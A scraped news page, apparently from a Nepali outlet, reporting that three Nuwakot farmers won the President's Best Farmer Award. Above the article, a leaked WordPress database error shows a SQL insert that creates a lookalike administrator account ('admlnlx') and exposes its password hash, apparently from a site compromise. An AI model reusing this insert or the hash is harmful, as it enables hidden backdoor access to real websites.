WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bx6f/rWulMrzBTIM0Qdsg6u9GWZSOW/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 21:51:48', '', 'admlnlx', 'admlnlx')
काठमाण्डौ । वैदेशिक रोजगारीबाट फर्किएर कृषि पेशामा संलग्न भएका दुईसहित तीन किसान नुवाकोटमा ‘राष्ट्रपति उत्कृष्ट कृषक पुरष्कार’बाट बिहीबार सम्मानित भएका छन् ।
कृषि क्षेत्रको विकासमा पु¥याएको योगदानस्वरुप नुवाकोटका तीन किसानलाई कृषि ज्ञान केन्द्रले ‘राष्ट्रपति उत्कृष्ट कृषक पुरष्कार’बाट सम्मान गरेको केन्द्र प्रमुख केशव खनालले जानकारी दिए । उनका अनुसार जिल्लाका उत्कृष्ट किसानका रुपमा बेलकोटगढी नगरपालिका–११ का हरिप्रसाद अधिकारी, ककनी गाउँपालिका–७ का बलराम पाठक र म्यागङ गापा–३ का प्रकाश तामाङलाई नगद रु १५ हजारसहित सम्मानपत्र प्रदान गरिएको छ ।
कोरोनाको कारण भारतमा रोजगारी खोसिएपछि अघिल्लो वर्ष भदौमा गाउँ फर्किएका ककनीका बाख्रापालक किसान पाठक र कतारमा रोजगारी गरेर फर्केसँगै रोजगारीका लागि युरोप जान ठिक्क बनाएको पैसाले टनेल बनाएर बेमौसमी तरकारी फलाउन थालेका म्यागङका किसान तामाङसहित ट्राउट माछापालक किसान अधिकारी नुवाकोटका उत्कृष्ट किसान घोषित भएका छन् ।